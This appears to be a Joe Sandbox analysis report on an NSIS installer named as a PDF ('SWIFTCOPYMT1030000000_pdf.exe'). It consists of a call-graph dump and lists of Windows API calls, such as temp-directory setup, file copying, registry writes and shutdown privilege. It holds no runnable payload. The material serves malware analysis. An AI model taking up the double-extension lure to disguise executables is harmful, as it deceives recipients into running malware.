404b4f 5066 404bfb 5064->5066 5070 404a5e 5064->5070 5075 404ba8 SendMessageA 5064->5075 5069 403e87 19 API calls 5065->5069 5071 404c05 SendMessageA 5066->5071 5072 404c0d 5066->5072 5073 404918 SendMessageA SendMessageA 5067->5073 5068->5064 5091 404adc 5068->5091 5112 40474f SendMessageA 5068->5112 5074 40494a 
5069->5074 5076 403eee 8 API calls 5070->5076 5071->5072 5083 404c26 5072->5083 5084 404c1f ImageList_Destroy 5072->5084 5088 404c36 5072->5088 5073->5063 5079 403e87 19 API calls 5074->5079 5075->5070 5081 404bbd SendMessageA 5075->5081 5082 404df1 5076->5082 5077 404b41 SendMessageA 5077->5064 5092 404958 5079->5092 5080 404da5 5080->5070 5089 404db7 ShowWindow GetDlgItem ShowWindow 5080->5089 5086 404bd0 5081->5086 5087 404c2f GlobalFree 5083->5087 5083->5088 5084->5083 5085 404a2c GetWindowLongA SetWindowLongA 5090 404a45 5085->5090 5097 404be1 SendMessageA 5086->5097 5087->5088 5088->5080 5106 404c71 5088->5106 5117 4047cf 5088->5117 5089->5070 5093 404a63 5090->5093 5094 404a4b ShowWindow 5090->5094 5091->5064 5091->5077 5092->5085 5096 4049a7 SendMessageA 5092->5096 5098 404a26 5092->5098 5100 4049e3 SendMessageA 5092->5100 5101 4049f4 SendMessageA 5092->5101 5111 403ebc SendMessageA 5093->5111 5110 403ebc SendMessageA 5094->5110 5096->5092 5097->5066 5098->5085 5098->5090 5100->5092 5101->5092 5103 404d7b InvalidateRect 5103->5080 5105 404d91 5103->5105 5104 404cb5 5104->5103 5109 404d29 SendMessageA SendMessageA 5104->5109 5108 40466d 21 API calls 5105->5108 5106->5104 5107 404c9f SendMessageA 5106->5107 5107->5104 5108->5080 5109->5104 5110->5070 5111->5068 5113 404772 GetMessagePos ScreenToClient SendMessageA 5112->5113 5114 4047ae SendMessageA 5112->5114 5115 4047a6 5113->5115 5116 4047ab 5113->5116 5114->5115 5115->5091 5116->5114 5126 405b77 lstrcpynA 5117->5126 5119 4047e2 5127 405ad5 wsprintfA 5119->5127 5121 4047ec 5122 40140b 2 API calls 5121->5122 5123 4047f5 5122->5123 5128 405b77 lstrcpynA 5123->5128 5125 4047fc 5125->5106 5126->5119 5127->5121 5128->5125 3860 100026c2 3861 10002712 3860->3861 3862 100026d2 VirtualProtect 3860->3862 3862->3861 5129 401705 5130 402a07 18 API calls 5129->5130 5131 40170c SearchPathA 5130->5131 5132 4027c7 5131->5132 5133 401727 5131->5133 5133->5132 5135 405b77 lstrcpynA 5133->5135 5135->5132 5136 404607 5137 
404633 5136->5137 5138 404617 5136->5138 5140 404666 5137->5140 5141 404639 SHGetPathFromIDListA 5137->5141 5147 40538c GetDlgItemTextA 5138->5147 5143 404650 SendMessageA 5141->5143 5144 404649 5141->5144 5142 404624 SendMessageA 5142->5137 5143->5140 5146 40140b 2 API calls 5144->5146 5146->5143 5147->5142 5148 404e07 5149 404e1b IsWindowVisible 5148->5149 5150 404e0b 5148->5150 5152 404e31 5149->5152 5153 404e65 5149->5153 5151 403ed3 SendMessageA 5150->5151 5155 404e18 5151->5155 5156 40474f 5 API calls 5152->5156 5154 404e6a CallWindowProcA 5153->5154 5154->5155 5157 404e3b 5156->5157 5157->5154 5158 4047cf 4 API calls 5157->5158 5158->5153 5159 402188 5160 402a07 18 API calls 5159->5160 5161 40218e 5160->5161 5162 402a07 18 API calls 5161->5162 5163 402197 5162->5163 5164 402a07 18 API calls 5163->5164 5165 4021a0 5164->5165 5166 405e7b 2 API calls 5165->5166 5167 4021a9 5166->5167 5168 4021ba lstrlenA lstrlenA 5167->5168 5169 4021ad 5167->5169 5171 404e84 25 API calls 5168->5171 5170 404e84 25 API calls 5169->5170 5173 4021b5 5169->5173 5170->5173 5172 4021f6 SHFileOperationA 5171->5172 5172->5169 5172->5173 5174 40220a 5175 402211 5174->5175 5178 402224 5174->5178 5176 405b99 18 API calls 5175->5176 5177 40221e 5176->5177 5179 4053a8 MessageBoxIndirectA 5177->5179 5179->5178 5180 40260c 5181 402613 5180->5181 5182 40289c 5180->5182 5183 402619 FindClose 5181->5183 5183->5182 5184 40268d 5185 402a07 18 API calls 5184->5185 5187 40269b 5185->5187 5186 4026b1 5188 405800 2 API calls 5186->5188 5187->5186 5189 402a07 18 API calls 5187->5189 5190 4026b7 5188->5190 5189->5186 5210 405825 GetFileAttributesA CreateFileA 5190->5210 5192 4026c4 5193 4026d0 GlobalAlloc 5192->5193 5194 40276d 5192->5194 5195 402764 CloseHandle 5193->5195 5196 4026e9 5193->5196 5197 402775 DeleteFileA 5194->5197 5198 402788 5194->5198 5195->5194 5211 4030a4 SetFilePointer 5196->5211 5197->5198 5200 4026ef 5201 403072 ReadFile 5200->5201 5202 4026f8 GlobalAlloc 5201->5202 5203 402708 
5202->5203 5204 40273c WriteFile GlobalFree 5202->5204 5206 402e6c 33 API calls 5203->5206 5205 402e6c 33 API calls 5204->5205 5207 402761 5205->5207 5209 402715 5206->5209 5207->5195 5208 402733 GlobalFree 5208->5204 5209->5208 5210->5192 5211->5200 5212 40278e 5213 4029ea 18 API calls 5212->5213 5214 402794 5213->5214 5215 4027b8 5214->5215 5216 4027cf 5214->5216 5222 40266d 5214->5222 5217 4027bd 5215->5217 5225 4027cc 5215->5225 5218 4027e5 5216->5218 5219 4027d9 5216->5219 5226 405b77 lstrcpynA 5217->5226 5221 405b99 18 API calls 5218->5221 5220 4029ea 18 API calls 5219->5220 5220->5225 5221->5225 5225->5222 5227 405ad5 wsprintfA 5225->5227 5226->5222 5227->5222 5228 401490 5229 404e84 25 API calls 5228->5229 5230 401497 5229->5230 5231 100015d0 5232 100014d8 4 API calls 5231->5232 5235 100015e8 5232->5235 5233 1000162e GlobalFree 5234 10001603 5234->5233 5235->5233 5235->5234 5236 1000161a VirtualFree 5235->5236 5236->5233 5237 401b11 5238 401b62 5237->5238 5239 401b1e 5237->5239 5240 401b66 5238->5240 5241 401b8b GlobalAlloc 5238->5241 5245 401ba6 5239->5245 5247 401b35 5239->5247 5249 402224 5240->5249 5258 405b77 lstrcpynA 5240->5258 5242 405b99 18 API calls 5241->5242 5242->5245 5243 405b99 18 API calls 5246 40221e 5243->5246 5245->5243 5245->5249 5251 4053a8 MessageBoxIndirectA 5246->5251 5256 405b77 lstrcpynA 5247->5256 5248 401b78 GlobalFree 5248->5249 5251->5249 5252 401b44 5257 405b77 lstrcpynA 5252->5257 5254 401b53 5259 405b77 lstrcpynA 5254->5259 5256->5252 5257->5254 5258->5248 5259->5249 5260 402814 5261 4029ea 18 API calls 5260->5261 5262 40281a 5261->5262 5263 40284b 5262->5263 5264 40266d 5262->5264 5266 402828 5262->5266 5263->5264 5265 405b99 18 API calls 5263->5265 5265->5264 5266->5264 5268 405ad5 wsprintfA 5266->5268 5268->5264 4578 401595 4579 402a07 18 API calls 4578->4579 4580 40159c SetFileAttributesA 4579->4580 4581 4015ae 4580->4581 5269 401c95 5270 4029ea 18 API calls 5269->5270 5271 401c9c 5270->5271 5272 4029ea 18 API calls 
5271->5272 5273 401ca4 GetDlgItem 5272->5273 5274 4024c9 5273->5274 4600 402517 4601 4029ea 18 API calls 4600->4601 4604 402521 4601->4604 4602 402597 4603 402555 ReadFile 4603->4602 4603->4604 4604->4602 4604->4603 4605 402599 4604->4605 4606 4025a9 4604->4606 4609 405ad5 wsprintfA 4605->4609 4606->4602 4608 4025bf SetFilePointer 4606->4608 4608->4602 4609->4602 5275 10001058 5276 1000123b 3 API calls 5275->5276 5278 10001074 5276->5278 5277 100010dc 5278->5277 5279 100014d8 4 API calls 5278->5279 5280 10001091 5278->5280 5279->5280 5281 100014d8 4 API calls 5280->5281 5282 100010a1 5281->5282 5283 100010b1 5282->5283 5284 100010a8 GlobalSize 5282->5284 5285 100010b5 GlobalAlloc 5283->5285 5286 100010c6 5283->5286 5284->5283 5287 100014ff 3 API calls 5285->5287 5288 100010d1 GlobalFree 5286->5288 5287->5286 5288->5277 4659 40231a 4660 402320 4659->4660 4661 402a07 18 API calls 4660->4661 4662 402332 4661->4662 4663 402a07 18 API calls 4662->4663 4664 40233c RegCreateKeyExA 4663->4664 4665 402366 4664->4665 4666 40266d 4664->4666 4667 40237e 4665->4667 4668 402a07 18 API calls 4665->4668 4669 40238a 4667->4669 4671 4029ea 18 API calls 4667->4671 4670 402377 lstrlenA 4668->4670 4672 4023a5 RegSetValueExA 4669->4672 4673 402e6c 33 API calls 4669->4673 4670->4667 4671->4669 4674 4023bb RegCloseKey 4672->4674 4673->4672 4674->4666 5289 403f9b lstrcpynA lstrlenA 5290 404e1c 5291 404e24 IsWindowVisible 5290->5291 5295 404e3b 5290->5295 5292 404e31 5291->5292 5298 404e65 5291->5298 5294 40474f 5 API calls 5292->5294 5293 404e6a CallWindowProcA 5296 404e7e 5293->5296 5294->5295 5295->5293 5297 4047cf 4 API calls 5295->5297 5297->5298 5298->5293 5299 100010e0 5300 1000110e 5299->5300 5301 1000123b 3 API calls 5300->5301 5308 1000111e 5301->5308 5302 100011c4 GlobalFree 5303 100012bf 2 API calls 5303->5308 5304 100011c3 5304->5302 5305 1000123b 3 API calls 5305->5308 5306 10001155 GlobalAlloc 5306->5308 5307 100011ea GlobalFree 5307->5308 5308->5302 5308->5303 5308->5304 
5308->5305 5308->5306 5308->5307 5309 10001278 2 API calls 5308->5309 5310 100011b1 GlobalFree 5308->5310 5311 100012e8 lstrcpyA 5308->5311 5309->5310 5310->5308 5311->5308 5312 4016a1 5313 402a07 18 API calls 5312->5313 5314 4016a7 GetFullPathNameA 5313->5314 5315 4016be 5314->5315 5316 4016df 5314->5316 5315->5316 5319 405e7b 2 API calls 5315->5319 5317 4016f3 GetShortPathNameA 5316->5317 5318 40289c 5316->5318 5317->5318 5320 4016cf 5319->5320 5320->5316 5322 405b77 lstrcpynA 5320->5322 5322->5316 5323 402626 5324 402641 5323->5324 5325 402629 5323->5325 5326 4027c7 5324->5326 5329 405b77 lstrcpynA 5324->5329 5327 402636 FindNextFileA 5325->5327 5327->5324 5329->5326 5330 401d26 GetDC GetDeviceCaps 5331 4029ea 18 API calls 5330->5331 5332 401d44 MulDiv ReleaseDC 5331->5332 5333 4029ea 18 API calls 5332->5333 5334 401d63 5333->5334 5335 405b99 18 API calls 5334->5335 5336 401d9c CreateFontIndirectA 5335->5336 5337 4024c9 5336->5337 4079 40172c 4080 402a07 18 API calls 4079->4080 4081 401733 4080->4081 4085 405854 4081->4085 4083 40173a 4084 405854 2 API calls 4083->4084 4084->4083 4086 40585f GetTickCount GetTempFileNameA 4085->4086 4087 405890 4086->4087 4088 40588c 4086->4088 4087->4083 4088->4086 4088->4087 4089 401dac 4097 4029ea 4089->4097 4091 401db2 4092 4029ea 18 API calls 4091->4092 4093 401dbb 4092->4093 4094 401dc2 ShowWindow 4093->4094 4095 401dcd EnableWindow 4093->4095 4096 40289c 4094->4096 4095->4096 4098 405b99 18 API calls 4097->4098 4099 4029fe 4098->4099 4099->4091 5338 401eac 5339 402a07 18 API calls 5338->5339 5340 401eb3 5339->5340 5341 405e7b 2 API calls 5340->5341 5342 401eb9 5341->5342 5344 401ecb 5342->5344 5345 405ad5 wsprintfA 5342->5345 5345->5344 5346 4024ad 5347 402a07 18 API calls 5346->5347 5348 4024b4 5347->5348 5351 405825 GetFileAttributesA CreateFileA 5348->5351 5350 4024c0 5351->5350 5352 40192d 5353 402a07 18 API calls 5352->5353 5354 401934 lstrlenA 5353->5354 5355 4024c9 5354->5355 5356 401cb0 5357 4029ea 18 API calls 
5356->5357 5358 401cc0 SetWindowLongA 5357->5358 5359 40289c 5358->5359 5360 401a31 5361 4029ea 18 API calls 5360->5361 5362 401a37 5361->5362 5363 4029ea 18 API calls 5362->5363 5364 4019e1 5363->5364 5365 401e32 5366 402a07 18 API calls 5365->5366 5367 401e38 5366->5367 5368 404e84 25 API calls 5367->5368 5369 401e42 5368->5369 5370 405347 2 API calls 5369->5370 5373 401e48 5370->5373 5371 401e9e CloseHandle 5375 40266d 5371->5375 5372 401e67 WaitForSingleObject 5372->5373 5374 401e75 GetExitCodeProcess 5372->5374 5373->5371 5373->5372 5373->5375 5376 405edb 2 API calls 5373->5376 5377 401e90 5374->5377 5378 401e87 5374->5378 5376->5372 5377->5371 5380 405ad5 wsprintfA 5378->5380 5380->5377 4486 4015b3 4487 402a07 18 API calls 4486->4487 4488 4015ba 4487->4488 4489 4056bd 4 API calls 4488->4489 4500 4015c2 4489->4500 4490 40160a 4492 401638 4490->4492 4493 40160f 4490->4493 4491 40564f CharNextA 4494 4015d0 CreateDirectoryA 4491->4494 4497 401423 25 API calls 4492->4497 4495 401423 25 API calls 4493->4495 4496 4015e5 GetLastError 4494->4496 4494->4500 4498 401616 4495->4498 4499 4015f2 GetFileAttributesA 4496->4499 4496->4500 4503 401630 4497->4503 4504 405b77 lstrcpynA 4498->4504 4499->4500 4500->4490 4500->4491 4502 401621 SetCurrentDirectoryA 4502->4503 4504->4502 4505 4039b4 4506 403b07 4505->4506 4507 4039cc 4505->4507 4509 403b58 4506->4509 4510 403b18 GetDlgItem GetDlgItem 4506->4510 4507->4506 4508 4039d8 4507->4508 4511 4039e3 SetWindowPos 4508->4511 4512 4039f6 4508->4512 4514 403bb2 4509->4514 4522 401389 2 API calls 4509->4522 4513 403e87 19 API calls 4510->4513 4511->4512 4516 403a13 4512->4516 4517 4039fb ShowWindow 4512->4517 4518 403b42 SetClassLongA 4513->4518 4515 403ed3 SendMessageA 4514->4515 4523 403b02 4514->4523 4545 403bc4 4515->4545 4519 403a35 4516->4519 4520 403a1b DestroyWindow 4516->4520 4517->4516 4521 40140b 2 API calls 4518->4521 4525 403a3a SetWindowLongA 4519->4525 4526 403a4b 4519->4526 4524 403e10 4520->4524 4521->4509 4527 
403b8a 4522->4527 4524->4523 4534 403e41 ShowWindow 4524->4534 4525->4523 4530 403af4 4526->4530 4531 403a57 GetDlgItem 4526->4531 4527->4514 4532 403b8e SendMessageA 4527->4532 4528 40140b 2 API calls 4528->4545 4529 403e12 DestroyWindow EndDialog 4529->4524 4533 403eee 8 API calls 4530->4533 4535 403a87 4531->4535 4536 403a6a SendMessageA IsWindowEnabled 4531->4536 4532->4523 4533->4523 4534->4523 4538 403a94 4535->4538 4539 403adb SendMessageA 4535->4539 4540 403aa7 4535->4540 4549 403a8c 4535->4549 4536->4523 4536->4535 4537 405b99 18 API calls 4537->4545 4538->4539 4538->4549 4539->4530 4542 403ac4 4540->4542 4543 403aaf 4540->4543 4541 403e60 SendMessageA 4544 403ac2 4541->4544 4547 40140b 2 API calls 4542->4547 4546 40140b 2 API calls 4543->4546 4544->4530 4545->4523 4545->4528 4545->4529 4545->4537 4548 403e87 19 API calls 4545->4548 4551 403e87 19 API calls 4545->4551 4566 403d52 DestroyWindow 4545->4566 4546->4549 4550 403acb 4547->4550 4548->4545 4549->4541 4550->4530 4550->4549 4552 403c3f GetDlgItem 4551->4552 4553 403c54 4552->4553 4554 403c5c ShowWindow KiUserCallbackDispatcher 4552->4554 4553->4554 4575 403ea9 KiUserCallbackDispatcher 4554->4575 4556 403c86 EnableWindow 4559 403c9a 4556->4559 4557 403c9f GetSystemMenu EnableMenuItem SendMessageA 4558 403ccf SendMessageA 4557->4558 4557->4559 4558->4559 4559->4557 4576 403ebc SendMessageA 4559->4576 4577 405b77 lstrcpynA 4559->4577 4562 403cfd lstrlenA 4563 405b99 18 API calls 4562->4563 4564 403d0e SetWindowTextA 4563->4564 4565 401389 2 API calls 4564->4565 4565->4545 4566->4524 4567 403d6c CreateDialogParamA 4566->4567 4567->4524 4568 403d9f 4567->4568 4569 403e87 19 API calls 4568->4569 4570 403daa GetDlgItem GetWindowRect ScreenToClient SetWindowPos 4569->4570 4571 401389 2 API calls 4570->4571 4572 403df0 4571->4572 4572->4523 4573 403df8 ShowWindow 4572->4573 4574 403ed3 SendMessageA 4573->4574 4574->4524 4575->4556 4576->4559 4577->4562 4582 402036 4583 402a07 18 API calls 4582->4583 4584 
40203d 4583->4584 4585 402a07 18 API calls 4584->4585 4586 402047 4585->4586 4587 402a07 18 API calls 4586->4587 4588 402050 4587->4588 4589 402a07 18 API calls 4588->4589 4590 40205a 4589->4590 4591 402a07 18 API calls 4590->4591 4592 402064 4591->4592 4593 402078 CoCreateInstance 4592->4593 4594 402a07 18 API calls 4592->4594 4597 402097 4593->4597 4598 40214d 4593->4598 4594->4593 4595 401423 25 API calls 4596 40217f 4595->4596 4597->4598 4599 40212c MultiByteToWideChar 4597->4599 4598->4595 4598->4596 4599->4598 5381 4014b7 5382 4014bd 5381->5382 5383 401389 2 API calls 5382->5383 5384 4014c5 5383->5384 5385 10002977 5386 1000298f 5385->5386 5387 10001551 2 API calls 5386->5387 5388 100029aa 5387->5388 4616 402438 4617 402b11 19 API calls 4616->4617 4618 402442 4617->4618 4619 4029ea 18 API calls 4618->4619 4620 40244b 4619->4620 4621 402455 4620->4621 4625 40266d 4620->4625 4622 402462 RegEnumKeyA 4621->4622 4623 40246e RegEnumValueA 4621->4623 4624 402487 RegCloseKey 4622->4624 4623->4624 4623->4625 4624->4625 4627 401bb8 4628 4029ea 18 API calls 4627->4628 4629 401bbf 4628->4629 4630 4029ea 18 API calls 4629->4630 4631 401bc9 4630->4631 4632 401bd9 4631->4632 4633 402a07 18 API calls 4631->4633 4634 401be9 4632->4634 4635 402a07 18 API calls 4632->4635 4633->4632 4636 401bf4 4634->4636 4637 401c38 4634->4637 4635->4634 4638 4029ea 18 API calls 4636->4638 4639 402a07 18 API calls 4637->4639 4640 401bf9 4638->4640 4641 401c3d 4639->4641 4642 4029ea 18 API calls 4640->4642 4643 402a07 18 API calls 4641->4643 4644 401c02 4642->4644 4645 401c46 FindWindowExA 4643->4645 4646 401c28 SendMessageA 4644->4646 4647 401c0a SendMessageTimeoutA 4644->4647 4648 401c64 4645->4648 4646->4648 4647->4648 4649 402239 4650 402241 4649->4650 4651 402247 4649->4651 4652 402a07 18 API calls 4650->4652 4653 402257 4651->4653 4654 402a07 18 API calls 4651->4654 4652->4651 4655 402a07 18 API calls 4653->4655 4657 402265 4653->4657 4654->4653 4655->4657 4656 402a07 18 API calls 4658 
40226e WritePrivateProfileStringA 4656->4658 4657->4656 4697 4022be 4698 4022c3 4697->4698 4699 4022ee 4697->4699 4701 402b11 19 API calls 4698->4701 4700 402a07 18 API calls 4699->4700 4702 4022f5 4700->4702 4703 4022ca 4701->4703 4709 402a47 RegOpenKeyExA 4702->4709 4704 4022d4 4703->4704 4708 40230b 4703->4708 4705 402a07 18 API calls 4704->4705 4706 4022db RegDeleteValueA RegCloseKey 4705->4706 4706->4708 4710 402adb 4709->4710 4713 402a72 4709->4713 4710->4708 4711 402a98 RegEnumKeyA 4712 402aaa RegCloseKey 4711->4712 4711->4713 4715 405ea2 3 API calls 4712->4715 4713->4711 4713->4712 4714 402acf RegCloseKey 4713->4714 4716 402a47 3 API calls 4713->4716 4719 402abe 4714->4719 4717 402aba 4715->4717 4716->4713 4718 402aea RegDeleteKeyA 4717->4718 4717->4719 4718->4719 4719->4710 4720 40173f 4721 402a07 18 API calls 4720->4721 4722 401746 4721->4722 4723 401764 4722->4723 4724 40176c 4722->4724 4760 405b77 lstrcpynA 4723->4760 4761 405b77 lstrcpynA 4724->4761 4727 40176a 4730 405de2 5 API calls 4727->4730 4728 401777 4729 405624 3 API calls 4728->4729 4731 40177d lstrcatA 4729->4731 4734 401789 4730->4734 4731->4727 4732 405e7b 2 API calls 4732->4734 4733 4017ca 4735 405800 2 API calls 4733->4735 4734->4732 4734->4733 4737 4017a0 CompareFileTime 4734->4737 4738 401864 4734->4738 4739 40183b 4734->4739 4741 405b77 lstrcpynA 4734->4741 4747 405b99 18 API calls 4734->4747 4756 4053a8 MessageBoxIndirectA 4734->4756 4759 405825 GetFileAttributesA CreateFileA 4734->4759 4735->4734 4737->4734 4740 404e84 25 API calls 4738->4740 4743 404e84 25 API calls 4739->4743 4749 401850 4739->4749 4742 40186e 4740->4742 4741->4734 4744 402e6c 33 API calls 4742->4744 4743->4749 4745 401881 4744->4745 4746 401895 SetFileTime 4745->4746 4748 4018a7 FindCloseChangeNotification 4745->4748 4746->4748 4747->4734 4748->4749 4750 4018b8 4748->4750 4751 4018d0 4750->4751 4752 4018bd 4750->4752 4753 405b99 18 API calls 4751->4753 4754 405b99 18 API calls 4752->4754 4755 4018d8 4753->4755 
4757 4018c5 lstrcatA 4754->4757 4758 4053a8 MessageBoxIndirectA 4755->4758 4756->4734 4757->4755 4758->4749 4759->4734 4760->4727 4761->4728 5389 40163f 5390 402a07 18 API calls 5389->5390 5391 401645 5390->5391 5392 405e7b 2 API calls 5391->5392 5393 40164b 5392->5393 5394 40193f 5395 4029ea 18 API calls 5394->5395 5396 401946 5395->5396 5397 4029ea 18 API calls 5396->5397 5398 401950 5397->5398 5399 402a07 18 API calls 5398->5399 5400 401959 5399->5400 5401 40196c lstrlenA 5400->5401 5402 4019a7 5400->5402 5403 401976 5401->5403 5403->5402 5407 405b77 lstrcpynA 5403->5407 5405 401990 5405->5402 5406 40199d lstrlenA 5405->5406 5406->5402 5407->5405

                                      APIs
                                      • #17.COMCTL32 ref: 00403110
                                      • SetErrorMode.KERNELBASE(00008001), ref: 0040311B
                                      • OleInitialize.OLE32(00000000), ref: 00403122
                                        • Part of subcall function 00405EA2: GetModuleHandleA.KERNEL32(?,?,?,00403134,00000008), ref: 00405EB4
                                        • Part of subcall function 00405EA2: LoadLibraryA.KERNELBASE(?,?,?,00403134,00000008), ref: 00405EBF
                                        • Part of subcall function 00405EA2: GetProcAddress.KERNEL32(00000000,?), ref: 00405ED0
                                      • SHGetFileInfoA.SHELL32(0079DCB8,00000000,?,00000160,00000000,00000008), ref: 0040314A
                                        • Part of subcall function 00405B77: lstrcpynA.KERNEL32(?,?,00000400,0040315F,007A1F00,NSIS Error), ref: 00405B84
                                      • GetCommandLineA.KERNEL32(007A1F00,NSIS Error), ref: 0040315F
                                      • GetModuleHandleA.KERNEL32(00000000,"C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe",00000000), ref: 00403172
                                      • CharNextA.USER32(00000000,"C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe",00000020), ref: 0040319D
                                      • GetTempPathA.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,00000020), ref: 00403295
                                      • GetWindowsDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 004032A6
                                      • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 004032B2
                                      • GetTempPathA.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp), ref: 004032C6
                                      • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 004032CE
                                      • SetEnvironmentVariableA.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low), ref: 004032DF
                                      • SetEnvironmentVariableA.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\), ref: 004032E7
                                      • DeleteFileA.KERNELBASE(1033), ref: 004032FB
                                      • OleUninitialize.OLE32(?), ref: 004033A9
                                      • ExitProcess.KERNEL32 ref: 004033C9
                                      • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu.tmp,"C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe",00000000,?), ref: 004033D5
                                      • lstrcmpiA.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop), ref: 004033E1
                                      • CreateDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,00000000), ref: 004033ED
                                      • SetCurrentDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\), ref: 004033F4
                                      • DeleteFileA.KERNEL32(0079D8B8,0079D8B8,?,007A3000,?), ref: 0040344D
                                      • CopyFileA.KERNEL32(C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe,0079D8B8,00000001), ref: 00403461
                                      • CloseHandle.KERNEL32(00000000,0079D8B8,0079D8B8,?,0079D8B8,00000000), ref: 0040348E
                                      • GetCurrentProcess.KERNEL32(00000028,?,00000005,00000004,00000003), ref: 004034E3
                                      • ExitWindowsEx.USER32(00000002,00000000), ref: 0040351F
                                      • ExitProcess.KERNEL32 ref: 00403542
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.134273513880.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000006.00000002.134273476871.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                      • Associated: 00000006.00000002.134273555516.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                      • Associated: 00000006.00000002.134273591463.0000000000409000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000006.00000002.134273591463.000000000077A000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000006.00000002.134273591463.0000000000780000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000006.00000002.134273591463.0000000000784000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000006.00000002.134273591463.0000000000788000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000006.00000002.134273591463.00000000007A0000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000006.00000002.134273591463.00000000007A4000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000006.00000002.134273591463.00000000007A7000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000006.00000002.134273591463.00000000007BD000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000006.00000002.134274096358.00000000007BF000.00000002.00000001.01000000.00000004.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_400000_SWIFTCOPYMT1030000000_pdf.jbxd
                                      Similarity
                                      • API ID: File$DirectoryExitHandleProcesslstrcat$CurrentDeleteEnvironmentModulePathTempVariableWindows$AddressCharCloseCommandCopyCreateErrorInfoInitializeLibraryLineLoadModeNextProcUninitializelstrcmpilstrcpyn
                                      • String ID: "$"C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe"$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe$C:\Users\user\udskriftskartotek\chiromancy\refalling$C:\Users\user\udskriftskartotek\chiromancy\refalling\avram\Peatery50\Busboy$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$\Temp$~nsu.tmp
                                      • API String ID: 4107622049-3377797858
                                      • Opcode ID: a3e75096bba33f31aa827b02cc33142ec1426715b727b680d56db394eb4d4ef5
                                      • Instruction ID: 3931d960d2cecc16523f178db0b803f8d2f925e5e1ab1ff86deffc182e7e2b76
                                      • Opcode Fuzzy Hash: a3e75096bba33f31aa827b02cc33142ec1426715b727b680d56db394eb4d4ef5
                                      • Instruction Fuzzy Hash: 01B10A709083816EE7116F755C4DA2B7EE8EB86306F04457EF181B62E2C77C9A05CB6E
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph
                                      • Legend: Executed / Not Executed (graph image not reproduced; function entry block 404fc2-404fdd)
                                      APIs
                                      • GetDlgItem.USER32(?,00000403), ref: 00405021
                                      • GetDlgItem.USER32(?,000003EE), ref: 00405030
                                      • GetClientRect.USER32(?,?), ref: 0040506D
                                      • GetSystemMetrics.USER32(00000015), ref: 00405075
                                      • SendMessageA.USER32(?,0000101B,00000000,00000002), ref: 00405096
                                      • SendMessageA.USER32(?,00001036,00004000,00004000), ref: 004050A7
                                      • SendMessageA.USER32(?,00001001,00000000,00000110), ref: 004050BA
                                      • SendMessageA.USER32(?,00001026,00000000,00000110), ref: 004050C8
                                      • SendMessageA.USER32(?,00001024,00000000,?), ref: 004050DB
                                      • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 004050FD
                                      • ShowWindow.USER32(?,00000008), ref: 00405111
                                      • GetDlgItem.USER32(?,000003EC), ref: 00405132
                                      • SendMessageA.USER32(00000000,00000401,00000000,75300000), ref: 00405142
                                      • SendMessageA.USER32(00000000,00000409,00000000,?), ref: 0040515B
                                      • SendMessageA.USER32(00000000,00002001,00000000,00000110), ref: 00405167
                                      • GetDlgItem.USER32(?,000003F8), ref: 0040503F
                                        • Part of subcall function 00403EBC: SendMessageA.USER32(00000028,?,00000001,00403CED), ref: 00403ECA
                                      • GetDlgItem.USER32(?,000003EC), ref: 00405184
                                      • CreateThread.KERNELBASE(00000000,00000000,Function_00004F56,00000000), ref: 00405192
                                      • FindCloseChangeNotification.KERNELBASE(00000000), ref: 00405199
                                      • ShowWindow.USER32(00000000), ref: 004051BD
                                      • ShowWindow.USER32(000103F6,00000008), ref: 004051C2
                                      • ShowWindow.USER32(00000008), ref: 00405209
                                      • SendMessageA.USER32(000103F6,00001004,00000000,00000000), ref: 0040523B
                                      • CreatePopupMenu.USER32 ref: 0040524C
                                      • AppendMenuA.USER32(00000000,00000000,00000001,00000000), ref: 00405261
                                      • GetWindowRect.USER32(000103F6,?), ref: 00405274
                                      • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 00405298
                                      • SendMessageA.USER32(?,0000102D,00000000,?), ref: 004052D3
                                      • OpenClipboard.USER32(00000000), ref: 004052E3
                                      • EmptyClipboard.USER32 ref: 004052E9
                                      • GlobalAlloc.KERNEL32(00000042,?,?,?,00000000,?,00000000), ref: 004052F2
                                      • GlobalLock.KERNEL32(00000000,?,?,00000000,?,00000000), ref: 004052FC
                                      • SendMessageA.USER32(?,0000102D,00000000,?), ref: 00405310
